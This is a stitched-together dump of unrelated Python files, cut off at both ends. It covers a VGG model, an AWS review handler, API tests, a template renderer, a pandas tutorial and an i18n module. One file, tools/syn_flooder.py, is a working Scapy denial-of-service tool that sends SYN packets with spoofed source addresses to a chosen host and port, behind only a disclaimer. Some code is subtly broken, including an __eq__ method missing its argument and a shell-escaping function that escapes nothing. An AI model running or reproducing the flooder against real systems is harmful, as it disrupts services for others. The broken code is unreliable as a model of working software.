* 6 * 6, 4096), nn.ReLU(True), nn.Dropout(), nn.Linear(4096, 4096), nn.ReLU(True), nn.Dropout(), nn.Linear(4096, num_classes), ) if init_weights: self._initialize_weights() def forward(self, x: torch.Tensor) -> torch.Tensor: x = self.features(x) x = self.avgpool(x) x = torch.flatten(x, 1) x = self.classifier(x) return x def _initialize_weights(self) -> None: for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') if m.bias is not None: nn.init.constant_(m.bias, 0) elif isinstance(m, nn.BatchNorm2d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) elif isinstance(m, nn.Linear): nn.init.normal_(m.weight, 0, 0.01) nn.init.constant_(m.bias, 0) def make_layers(cfg: List[Union[str, int]], batch_norm: bool = False) -> nn.Sequential: layers: List[nn.Module] = [] in_channels = 3 for v in cfg: if v == 'M': layers += [nn.MaxPool2d(kernel_size=2, stride=2)] else: v = cast(int, v) conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1) if batch_norm: layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)] else: layers += [conv2d, nn.ReLU(inplace=True)] in_channels = v return nn.Sequential(*layers) cfgs: Dict[str, List[Union[str, int]]] = { 'A': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'B': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'], 'D': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'], 'E': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'], 'F': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M'] } def _vgg(arch: str, cfg: str, batch_norm: bool, num_classes: int, **kwargs: Any) -> VGG: model = VGG(make_layers(cfgs[cfg], batch_norm=batch_norm), num_classes, **kwargs) return model def vgg11_m4(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_m4', 'F', False, num_classes=num_classes, **kwargs) def vgg11_m4_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_m4_bn', 'F', True, num_classes=num_classes, **kwargs) def vgg11(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11', 'A', False, num_classes=num_classes, **kwargs) def vgg11_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg11_bn', 'A', True, num_classes=num_classes, **kwargs) def vgg13(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg13', 'B', False, num_classes=num_classes, **kwargs) def vgg13_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg13_bn', 'B', True, num_classes=num_classes, **kwargs) def vgg16(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg16', 'D', False, num_classes=num_classes, **kwargs) def vgg16_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg16_bn', 'D', True, num_classes=num_classes, **kwargs) def vgg19(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg19', 'E', False, num_classes=num_classes, **kwargs) def vgg19_bn(num_classes, **kwargs: Any) -> VGG: return _vgg('vgg19_bn', 'E', True, num_classes=num_classes, **kwargs) import json from boto3.dynamodb.conditions import Attr from datetime import datetime from utils import JsonPayloadBuilder, translate_text, format_update_expr, table, resp_handler @resp_handler def patch_review(key, ts, review, uid): resp_body = JsonPayloadBuilder().add_status(True).add_data(None).add_message('').compile() primary_key = { "course_key": key, "created_at": ts } if "comment" not in review: dt_now = datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z' table.update_item( Key=primary_key, ConditionExpression=Attr('uid').eq(uid), UpdateExpression="SET updated_at = :ts, benefit = :ben, difficulty = :diff, satisfaction = :sat", ExpressionAttributeValues={ ":ts": dt_now, ":ben": review["benefit"], ":diff": review["difficulty"], ":sat": review["satisfaction"] } ) return resp_body text = review["comment"] src_lang, translated = translate_text(text) dt_now = datetime.now().strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z' expr, expr_attr_name, expr_attr_val = format_update_expr(src_lang, translated, review, dt_now) table.update_item( Key=primary_key, ConditionExpression=Attr('uid').eq(uid), UpdateExpression=expr, ExpressionAttributeNames=expr_attr_name, ExpressionAttributeValues=expr_attr_val ) return resp_body def handler(event, context): req = json.loads(event['body']) params = { "key": event["pathParameters"]["key"], "ts": event["queryStringParameters"]["ts"], "review": req["data"], "uid": event['requestContext']['authorizer']['claims']['sub'] } return patch_review(**params) """ Contains a unified method for extracting literals from an AST in a common fashion. Extracted from Add_Neutral and Lambda_Identity. """ from typing import Optional import libcst def get_all_literals(cst_to_collect: "Node") -> [(str, "Node")]: """ Uses a LibCST Visitor to gather all "simple_string", "float" and "integer" literals in the given LibCST Node. If the LibCST Node is e.g. a module, it returns all modules. Can contain duplicates. For convenience, the return value is a tuple of ("type","value"). :param cst_to_collect: The LibCST Node to gather literals in. Recursively traverses down-stream. :returns: The seen literals, as a list of (type,value). Value is a libcst literal node. Extracted as used in multiple places, and for easier testability. """ visitor = __LiteralCollector() cst_to_collect.visit(visitor) results = [("simple_string", x) for x in visitor.seen_strings] \ + [("float", x) for x in visitor.seen_floats] \ + [("integer", x) for x in visitor.seen_integers] del visitor return results class __LiteralCollector(libcst.CSTVisitor): def __init__(self): self.seen_floats = [] self.seen_strings = [] self.seen_integers = [] def visit_Float(self, node: "Float") -> Optional[bool]: """ LibCST built-in traversal that puts all seen float-literals in the known literals. """ self.seen_floats.append(node) def visit_Integer(self, node: "Integer") -> Optional[bool]: """ LibCST built-in traversal that puts all seen float-literals in the known literals. """ self.seen_integers.append(node) def visit_SimpleString(self, node: "SimpleString") -> Optional[bool]: """ LibCST built-in traversal that puts all seen SimpleString-literals in the known literals. """ self.seen_strings.append(node) tools/syn_flooder.py1-10 #!/usr/bin/env python """Simple SYN Flooder and spoofer This software is intended for educational purposes and can only be used against systems with permission from owner. The user is the only one responsible for any damages. By using this software you agree with the terms. Usage: syn_flooder.py [--sleep=] [-v] [-vv] Options: -h, --help Show this screen. --version Show version. --sleep= How many seconds to sleep betseen scans [default: 0]. -v, --verbose Show addresses being spoofed. -vv, --very-verbose Display everything. """ from docopt import docopt import logging import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def main(arguments): src_net = "192.168.250." dst_ip = arguments[""] dst_port = int(arguments[""]) if arguments["--verbose"] == 1: verbose = True double_verbose = False elif arguments["--verbose"] == 2: double_verbose = True verbose = True else: double_verbose = False verbose = False if int(arguments["--sleep"]) != 0: sleep = True seconds = int(arguments["--sleep"]) else: sleep = False seconds = 0 print("\n###########################################") print("# Starting Denial of Service attack...") print("###########################################\n") for src_host in range(1,254): if verbose or double_verbose: print("[*] Sending spoofed SYN packets from %s%s" % (src_net, src_host)) print("--------------------------------------------") for src_port in range(1024, 65535): if double_verbose: print("[+] Sending a spoofed SYN packet from %s%s:%s" % (src_net, src_host, src_port)) # Build the packet src_ip = src_net + str(src_host) network_layer = IP(src=src_ip,dst=dst_ip) transport_layer = TCP(sport=src_port, dport=dst_port,flags="S") # Send the packet send(network_layer/transport_layer,verbose=False) if sleep: time.sleep(seconds) print("[+] Denial of Service attack finished.") if __name__ == '__main__': arguments = docopt(__doc__, version="SYN Flooder 1.0") main(arguments) src/cinefolders/export.py from pathlib import Path import string class ExportBash: def __init__(self,location): abslocation = location.absolute() # self.checkDestExists(location) #sort of assumes location is a filename #todo just figure this out for them if(len(location.suffix)==0): raise RuntimeError("Please specify an export file, not directory. Note: you must also specify an "+ "extension like '.sh'") self.checkmkdir(abslocation.parent) self.exportLocation = abslocation self.lines = ['#!/bin/bash'] self.createddirs = {} self.exportLocation.touch() #make sure we have permissions def checkDestExists(self,pathobj): try: pathobj.mkdir(parents=True) except FileExistsError as fee: if(fee.errno == 17): #ignore if dest already exists pass else: raise fee def checkmkdir(self,pathobj): if(not pathobj.exists() and str(pathobj.absolute()) not in self.createddirs): for p in pathobj.absolute().parents: self.createddirs.update({str(p):True}) self.lines.append('mkdir -p "'+self.escape_chars(str(pathobj.absolute()))+'"') def addCopy(self,src,dst): self.checkmkdir(dst.parent) self.lines.append('cp "' + self.escape_chars(str(src)) + '" "' + self.escape_chars(str(dst))+'"') def addMove(self,src,dst): self.checkmkdir(dst.parent) self.lines.append('mv "' + self.escape_chars(str(src)) + '" "' + self.escape_chars(str(dst))+'"') def escape_chars(self,text): escaped = str(text) trantab = str.maketrans({ # {"'":"\'", '"': '\"', # "#":"\#", # ":": "\:", # "!": "\!", # " ": "\ ", # ";":"\;", }) return escaped.translate(trantab) def writeout(self): if(len(self.lines)>1): fulltext = self.lines[0] + '\n\n' fulltext += '\n'.join(self.lines[1:]) fulltext += "\n\n#created by cinefolders: github.com/hgibs/cinefolders" self.exportLocation.write_text(self.escape_chars(fulltext)+'\n') else: print("Nothing to export!")rjkboyle/telnyx-python from __future__ import absolute_import, division, print_function import pytest import telnyx TEST_RESOURCE_ID = "123" class TestMessagingProfile(object): def test_is_listable(self, request_mock): resources = telnyx.MessagingProfile.list() request_mock.assert_requested("get", "/v2/messaging_profiles") assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingProfile) def test_is_retrievable(self, request_mock): resource = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) def test_is_creatable(self, request_mock): resource = telnyx.MessagingProfile.create(name="my-profile") request_mock.assert_requested("post", "/v2/messaging_profiles") assert isinstance(resource, telnyx.MessagingProfile) def test_is_saveable(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) messaging_profile.name = "value" resource = messaging_profile.save() request_mock.assert_requested( "patch", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) assert resource is messaging_profile def test_is_modifiable(self, request_mock): resource = telnyx.MessagingProfile.modify(TEST_RESOURCE_ID, name="Test") request_mock.assert_requested( "patch", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) assert isinstance(resource, telnyx.MessagingProfile) def test_is_deletable(self, request_mock): resource = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resource.delete() request_mock.assert_requested( "delete", "/v2/messaging_profiles/%s" % TEST_RESOURCE_ID ) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_messaging_phone_numbers(self, request_mock): resources = telnyx.MessagingProfile.list_phone_numbers(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_phone_numbers(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.phone_numbers() request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) @pytest.mark.skip(reason="Might be deprecated") def test_can_call_phone_numbers_forward_params(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.phone_numbers(page={"size": 10}) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/phone_numbers" % TEST_RESOURCE_ID, {"page": {"size": 10}}, ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.MessagingPhoneNumber) def test_can_call_messaging_short_codes(self, request_mock): resources = telnyx.MessagingProfile.list_short_codes(TEST_RESOURCE_ID) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) def test_can_call_short_codes(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.short_codes() request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) def test_can_call_short_codes_forward_params(self, request_mock): messaging_profile = telnyx.MessagingProfile.retrieve(TEST_RESOURCE_ID) resources = messaging_profile.short_codes(page={"size": 20}) request_mock.assert_requested( "get", "/v2/messaging_profiles/%s/short_codes" % TEST_RESOURCE_ID, {"page": {"size": 20}}, ) assert isinstance(resources.data, list) assert isinstance(resources.data[0], telnyx.ShortCode) run_describe_sns.py #!/usr/bin/env python3 from env import env from run_common import AWSCli aws_cli = AWSCli() def describe_sns_topic(): if not env.get('sns'): return False topic_name_list = list() sns_list = env['sns'] for sl in sns_list: if sl['TYPE'] == 'topic': topic_name_list.append(sl['NAME']) cmd = ['sns', 'list-topics'] result = aws_cli.run(cmd) for topic in result['Topics']: for tname in topic_name_list: suffix = ':%s' % tname # noinspection PyTypeChecker arn = topic['TopicArn'] if arn.endswith(suffix): return True return False results = list() if describe_sns_topic(): results.append('SNS Topic -------------- O') else: results.append('SNS Topic -------------- X') print('#' * 80) for r in results: print(r) print('#' * 80) 1-10 from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7 # Importing the Kratos Library import KratosMultiphysics as KratosMultiphysics import KratosMultiphysics.MeshingApplication as MeshingApplication def Factory(settings, Model): if not isinstance(settings, KratosMultiphysics.Parameters): raise Exception("expected input shall be a Parameters object, encapsulating a json string") return MultiscaleRefiningProcess(Model, settings["Parameters"]) class MultiscaleRefiningProcess(KratosMultiphysics.Process): def __init__(self, Model, settings ): ## Settings string in json format default_parameters = KratosMultiphysics.Parameters(""" { "main_model_part_name" : "MainModelPart", "visualization_model_part_name" : "VisualizationModelPart", "current_subscale" : 0, "maximum_number_of_subscales" : 4, "echo_level" : 0, "advanced_configuration" : { "echo_level" : 0, "number_of_divisions_at_subscale" : 2, "subscale_interface_base_name" : "refined_interface", "subscale_boundary_condition" : "Condition2D2N" } } """) # Overwrite the default settings with user-provided parameters self.settings = settings self.settings.RecursivelyValidateAndAssignDefaults(default_parameters) self.model = Model self.echo_level = self.settings['echo_level'].GetInt() self.current_subscale = self.settings['current_subscale'].GetInt() self.maximum_number_of_subscales = self.settings['maximum_number_of_subscales'].GetInt() # Get the coarse model part name self.coarse_model_part_name = self.settings['main_model_part_name'].GetString() if (self.current_subscale > 0): self.coarse_model_part_name += '_' + str(self.current_subscale) # Get the coarse model part self.coarse_model_part = self.model[self.coarse_model_part_name] # Get the visualization model part if (self.current_subscale == 0): self._InitializeVisualizationModelPart() else: self.visualization_model_part = self.model[self.settings['visualization_model_part_name'].GetString()] # Initialize the refined model part if (self.current_subscale < self.maximum_number_of_subscales): self._InitializeRefinedModelPart() def ExecuteInitialize(self): # Create the new subscale process self.subscales_utility = MeshingApplication.MultiscaleRefiningProcess( self.coarse_model_part, self.refined_model_part, self.visualization_model_part, self.settings["advanced_configuration"]) if self.echo_level > 0: print('The multiscale process is initialized') if self.echo_level > 1: print(self.model[self.coarse_model_part_name]) print(self.model[self.refined_model_part_name]) def ExecuteBeforeSolutionLoop(self): pass def ExecuteInitializeSolutionStep(self): self._ExecuteRefinement() def ExecuteFinalizeSolutionStep(self): self._ExecuteCoarsening() def ExecuteBeforeOutputStep(self): pass def ExecuteAfterOutputStep(self): pass def ExecuteFinalize(self): pass def Clear(self): pass def GetCoarseModelPart(self): return self.coarse_model_part def GetRefinedModelPart(self): return self.refined_model_part def GetVisualizationModelPart(self): return self.visualization_model_part def _InitializeVisualizationModelPart(self): visualization_model_part_name = self.settings['visualization_model_part_name'].GetString() self.visualization_model_part = self.model.CreateModelPart(visualization_model_part_name) buffer_size = self.coarse_model_part.GetBufferSize() self.visualization_model_part.SetBufferSize(buffer_size) MeshingApplication.MultiscaleRefiningProcess.InitializeNewModelPart(self.coarse_model_part, self.visualization_model_part) def _InitializeRefinedModelPart(self): self.refined_model_part_name = self.settings['main_model_part_name'].GetString() + '_' + str(self.current_subscale + 1) self.refined_model_part = self.model.CreateModelPart(self.refined_model_part_name) buffer_size = self.coarse_model_part.GetBufferSize() self.refined_model_part.SetBufferSize(buffer_size) MeshingApplication.MultiscaleRefiningProcess.InitializeNewModelPart(self.coarse_model_part, self.refined_model_part) def _ExecuteRefinement(self): self.subscales_utility.ExecuteRefinement() def _ExecuteCoarsening(self): self.subscales_utility.ExecuteCoarsening() import pyvista import numpy as np points = np.random.random((10, 3)) vpoints = pyvista.vtk_points(points) vpoints # doctest:+SKIP # Expected: ## (vtkmodules.vtkCommonCore.vtkPoints)0x7f0c2e26af40 nijotz/pdxburritoreview.com #!/usr/bin/env python from greshunkel.utils import parse_variable, interpolate from os import listdir, makedirs, path import re POSTS_DIR = "posts/" TEMPLATE_DIR = "templates/" BLOGPOST_FILE = "blog_post.html" BLOGPOST_TEMPLATE = TEMPLATE_DIR + BLOGPOST_FILE BUILD_DIR = "built/" DOCUMENTATION_FILE = "documentation.html" DOCUMENTATION_TEMPLATE = TEMPLATE_DIR + DOCUMENTATION_FILE def _render_file(file_yo, context, output_filename=None): if file_yo.get("children"): # We DoNt ReNdEr FiLeS wItH cHiLdReN for base_file in file_yo["children"]: _render_file(base_file, context) else: desired_fname = file_yo['filename'] if output_filename is None else output_filename output = open(BUILD_DIR + desired_fname, "w+") parent_file = None if file_yo['vars'].get("PARENT"): parent_file = open(file_yo['vars']['PARENT'], "r") in_file = open(file_yo['file'], "r") if parent_file: for line in parent_file: to_write = line if 'xXx' in line: if '@' in line: to_write = interpolate(line.replace("@", ""), {}, context) elif '=' in line: to_write = interpolate(line, file_yo, context) else: # ChIlD BloCk oR SoMeThIng, Yo beginning = line.split("xXx")[0] end = line.split("xXx")[2] block_name = line.split("xXx")[1].strip() block_data = file_yo['blocks'].get(block_name, "") to_write = beginning + block_data + end output.write(to_write if "core" not in to_write else to_write) else: for line in in_file: to_write = line if 'xXx' in line: to_write = interpolate(line, file_yo, context) output.write(to_write) if parent_file: parent_file.close() in_file.close() output.close() def _loop_context_interpolate(variable, loop_variable, current_item, i, context): if variable[1] == 'i': # i is special, it is an itervar muh_list = context.get(variable[0], None) return muh_list[i] if muh_list else "" elif variable[1].isdigit(): # They are trying to index a list return context.get(variable[0], None)[int(variable[1])] elif variable[0] == loop_variable: try: return current_item[variable[1]] except TypeError: import ipdb; ipdb.set_trace() # All else fails try to use the dict variable return current_item[variable[1]] def _render_loop(loop_obj, context): loop_list = loop_obj["loop_list"] loop_str = loop_obj["loop_str"] loop_variable = loop_obj["loop_variable"] #outer_loop_variable = loop_obj["outer_loop_variable"] temp_loop_str = "" regex = re.compile("xXx (?P[a-zA-Z_0-9\$]+) xXx") wombat = re.compile("xXx LOOP (?P[a-zA-S_]+) (?P[a-zA-S_\$]+) xXx(?P.*)xXx BBL xXx") shattered_loops = wombat.split(loop_str) if len(shattered_loops) != 1: print("BEEP BEEP BEEP SUBLOOP DETECTED") i = 0 for thing in context[loop_list]: # Lookit these higher order functions, godDAMN def loop_func(x): if x == 'i': return str(i) elif x == "BBL": return "" elif x == loop_variable: return str(thing) elif "$" in x and x in regex.findall(loop_str): #fUcK y = x.split("$") if y[0] == loop_variable and y[1].isdigit(): return thing[int(y[1])] return _loop_context_interpolate(y, loop_variable, thing, i, context) return x broken_man = regex.split(shattered_loops[0]) for chunk in broken_man: bro = loop_func(chunk) temp_loop_str = temp_loop_str + "".join(bro) if len(shattered_loops) != 1: # HACKIEST SHIT THAT EVER HACKED # TODO: If it ain't broke, don't fix it print("PARAMS HACK!") context[shattered_loops[2]] = thing["params"] temp_loop_str = temp_loop_str + _render_loop(loop_obj["loop_subloop"], context) if shattered_loops[4] != "": broken_man = regex.split(shattered_loops[4]) for chunk in broken_man: bro = loop_func(chunk) temp_loop_str = temp_loop_str + "".join(bro) i = i + 1 return temp_loop_str def parse_file(context, radical_file): tfile = open(TEMPLATE_DIR + radical_file, "r") file_meta = {} file_meta['file'] = TEMPLATE_DIR + radical_file file_meta['filename'] = radical_file file_meta['vars'] = {} file_meta['blocks'] = {} file_meta['loops'] = [] reading_block = False block_str = "" end_str = "" block_name = "" loop_stack = None active_loops = 0 for line in tfile: stripped = line.strip() if "xXx" in stripped and "=" in stripped.split("xXx")[1]: var = parse_variable(line) file_meta['vars'][var[0]] = var[1] elif "xXx TTYL xXx" == stripped: file_meta['blocks'][block_name] = block_str + end_str reading_block = False block_str = "" block_name = "" end_str = "" # We LoOpIn BaBy elif "xXx LOOP " in stripped: variables = stripped.split("xXx")[1].strip().replace("LOOP ", "").split(" ") active_loops = active_loops + 1 print("We've entered timeskip {}!".format(variables[1])) if loop_stack is None: loop_stack = { "loop_depth": active_loops, "loop_variable": variables[0], "loop_str": "", "loop_list": variables[1], "loop_subloop": None } else: #ThIs WoRkS FoR MoRe ThAn TwO LoOpS def recurse_bro(item): if item is None: loop_stack["loop_subloop"] = { "loop_depth": active_loops, "loop_variable": variables[0], "loop_str": "", "loop_list": variables[1], "loop_subloop": None } else: recurse_bro(item["loop_subloop"]) recurse_bro(loop_stack) elif "xXx BBL xXx" == stripped: active_loops = active_loops - 1 if active_loops == 0: temp_loop_str = _render_loop(loop_stack, context) # AsSuMe WeRe In A bLoCk block_str = block_str + temp_loop_str # wE DoNe LoOpIn NoW loop_stack = None elif "xXx" in stripped and reading_block is True: if '@' in stripped: line = stripped = interpolate(stripped.replace("@", ""), {}, context) elif "xXx" in stripped and reading_block is False: reading_block = True lstripped = line.split("xXx") block_name = lstripped[1].strip() block_str = lstripped[0] end_str = lstripped[2] if active_loops == 0 and reading_block is True and "xXx" not in stripped: block_str = block_str + line if active_loops > 0: def recurse_bro_2(item): if item is not None: if item["loop_depth"] <= active_loops: if "xXx LOOP" in stripped and item["loop_depth"] != active_loops: item["loop_str"] = item["loop_str"] + stripped elif "xXx LOOP" not in stripped: item["loop_str"] = item["loop_str"] + stripped recurse_bro_2(item["loop_subloop"]) recurse_bro_2(loop_stack) return file_meta def main(context): from greshunkel.context import DEFAULT_LANGUAGE context['DEFAULT_LANGUAGE'] = DEFAULT_LANGUAGE all_templates = [] required_dirs = ['./built', './built/blog'] for dirn in required_dirs: if not path.exists(dirn): makedirs(dirn) for radical_file in listdir(TEMPLATE_DIR): # We don't want to render the blog_post template by itself, or the documentation. if TEMPLATE_DIR + radical_file in [BLOGPOST_TEMPLATE, DOCUMENTATION_TEMPLATE]: continue if not radical_file.endswith(".html"): continue file_meta = parse_file(context, radical_file) all_templates.append(file_meta) # BuIlD a SiCk TrEe oF TeMpLaTeS yO tree = {} for tfile in all_templates: if tfile['vars'].get('PARENT'): parent = tfile['vars']['PARENT'] if tree.get(parent): tree[parent]['children'].append(tfile) else: tree[parent] = { 'children': [tfile] } for base_file in tree: _render_file(tree[base_file], context) # BeCaUsE WhY NoT return 0 0 """Rich Module""" __docformat__ = "numpy" import os from typing import Tuple from rich import panel from rich.console import Console, Theme from rich.text import Text from rich.color import Color from openbb_terminal import config_terminal as cfg from openbb_terminal import feature_flags as obbff # https://rich.readthedocs.io/en/stable/appendix/colors.html#appendix-colors # https://rich.readthedocs.io/en/latest/highlighting.html#custom-highlighters CUSTOM_THEME = Theme(cfg.theme.console_style) RICH_TAGS = [ "[menu]", "[/menu]", "[cmds]", "[/cmds]", "[info]", "[/info]", "[param]", "[/param]", "[src]", "[/src]", "[help]", "[/help]", ] USE_COLOR = True def no_panel(renderable, *args, **kwargs): # pylint: disable=unused-argument return renderable class ConsoleAndPanel: """Create a rich console to wrap the console print with a Panel""" def __init__(self): self.console = Console(theme=CUSTOM_THEME, highlight=False, soft_wrap=True) def capture(self): return self.console.capture() @staticmethod def filter_rich_tags(text): for val in RICH_TAGS: text = text.replace(val, "") return text @staticmethod def blend_text( message: str, color1: Tuple[int, int, int], color2: Tuple[int, int, int] ) -> Text: """Blend text from one color to another.""" text = Text(message) r1, g1, b1 = color1 r2, g2, b2 = color2 dr = r2 - r1 dg = g2 - g1 db = b2 - b1 size = len(text) + 5 for index in range(size): blend = index / size color = f"#{int(r1 + dr * blend):02X}{int(g1 + dg * blend):02X}{int(b1 + db * blend):02X}" text.stylize(color, index, index + 1) return text def print(self, *args, **kwargs): if kwargs and "text" in list(kwargs) and "menu" in list(kwargs): if not os.getenv("TEST_MODE"): if obbff.ENABLE_RICH_PANEL: version = self.blend_text( f"OpenBB Terminal v{obbff.VERSION}", Color.parse("#00AAFF").triplet, Color.parse("#E4003A").triplet, ) link = " (https://openbb.co)" link_text = Text(link) link_text.stylize("#FCED00", 0, len(link)) version += link_text self.console.print( panel.Panel( kwargs["text"], title=kwargs["menu"], subtitle_align="right", subtitle=version, ) ) else: self.console.print(kwargs["text"]) else: print(self.filter_rich_tags(kwargs["text"])) else: if not os.getenv("TEST_MODE"): self.console.print(*args, **kwargs) else: print(*args, **kwargs) console = ConsoleAndPanel() from .u2net_transformer_pseudo_dino_final import U2NET from .u2net import U2NETP #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Mon Jul 17 16:17:25 2017 @author: jorgemauricio """ # librerias import numpy as np from pandas import Series,DataFrame import pandas as pd # generar dos series, primer serie ser1 = Series([0,1,2],index=['A','B','C']) # desplegar ser1 # segunda serie ser2 = Series([3,4,5,6],index=['A','B','C','D']) # desplegar ser2 # que pasa cuando se agregan dos series ser1 + ser2 # verificar que los valores NAN se añaden automaticamente # ahora con DataFrames dframe1 = DataFrame(np.arange(4).reshape(2,2),columns=list('AB'),index=['NYC','LA']) # desplegar dframe1 # segundo DataFrame dframe2 = DataFrame(np.arange(9).reshape(3,3),columns=list('ADC'),index=['NYC','SF','LA']) # desplegar dframe2 # que pasa cuando los agregamos dframe1 + dframe2 # que pasa si queremos remplazar los valores Nan # usamos la funcion .add() dframe1.add(dframe2,fill_value=0) # ahora podemos ver que los valores estan completos, pero aun existen valores SF y B sin valores# -*- coding: utf-8 -*- # # Copyright 2017 # # Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # This is the main module from io import StringIO import collections import inspect import locale import logging import os import traceback __all__ = [ 'i18n', 'I18NMessage', 'TranslationService' ] log = logging.getLogger(__name__) def getLogger(o): '''Get a logger for an instance''' clz = o.__class__ return logging.getLogger('%s.%s' % (clz.__module__, clz.__name__)) class I18NMessage(object): '''Encode the information which message to display and the arguments for the message. Methods decorated with @i18n will return instanes of this type.''' def __init__(self, key, locale=None, *args, **kwargs): self.key, self.locale, self.args, self.kwargs = key, locale, args, kwargs def __repr__(self): if self.locale is None: return 'I18NMessage(%s, %r, %r)' % (self.key, self.args, self.kwargs) return 'I18NMessage(%s, locale=%r, %r, %r)' % (self.key, self.locale, self.args, self.kwargs) def __eq__(self): '''Two messages are the same when the key is the same and the arguments are the same. The locale is irrelevant.''' return isinstance(other, I18NMessage) and self.key == other.key and self.args == other.args and self.kwargs == other.kwargs def with_locale(self, locale): '''Create a new I18N message with a different locale. Use this to specify preferred locales for messages. A typical use case is when you need to display a message in two languages on the same screen, like language selectors which often display "German - Deutsch" or vocabulary learning.''' return I18NMessage(self.key, locale, *self.args, **self.kwargs) # Module names: file name of the module (with path) i18nKnownModules = {} def registerModuleForAutoConfig(func): '''Collect all modules which have I18N methods and functions in a single place. The list of modules can later be used to discover text files which contain messages. ''' module = inspect.getmodule(func) global i18nKnownModules if not module.__name__ in i18nKnownModules: log.info('Registering new module %s', module.__name__) i18nKnownModules[module.__name__] = inspect.getfile(func) return module def i18n(func): '''Decoration for a function or method which can be used to create I18N messages. If the method returns None, for example when a function only uses pass as body, a default I18N message will be supplied. The key of the message is built from the module + the function name. All the arguments to the function are passed to the I18N message. This way, you can do nothing to get the default behavior. Or you can return your own I18N message. Or you can just check the arguments and return None to still get the default behavior. ''' module = registerModuleForAutoConfig(func) key = '%s.%s' % (module.__name__, func.__name__) def wrapped_func(*args, **kwargs): #print 'wrapped_func',key,args,kwargs callargs = inspect.getcallargs(func, *args, **kwargs) result = func(*args, **kwargs) if result is None: return I18NMessage(key, None, *args, **callargs) return result return wrapped_func class DetailFormatter(object): '''Interface for detail formatters.''' def format(self, inst): return repr(inst) class DetailFormatterFactory(object): '''Interface for a factory of detail formatters.''' def can_handle(self, inst): '''Return True if this factory can create formatters for this object''' return False def create_formatter(self, locale): '''Actually create a formatter for an object. Factories can create new formatters with every call or return the same instance when it's stateless.''' raise NotImplementedError() class StringFormatter(DetailFormatter): def format(self, inst): return inst class StringFormatterFactory(DetailFormatterFactory): '''Formatter for plain strings. This exists because we want error messages for all types that don't have an formatter.''' def __init__(self): self.inst = StringFormatter() def can_handle(self, inst): return isinstance(inst, str) def create_formatter(self, locale): return self.inst class I18nMessageFormatter(DetailFormatter): '''Formatter 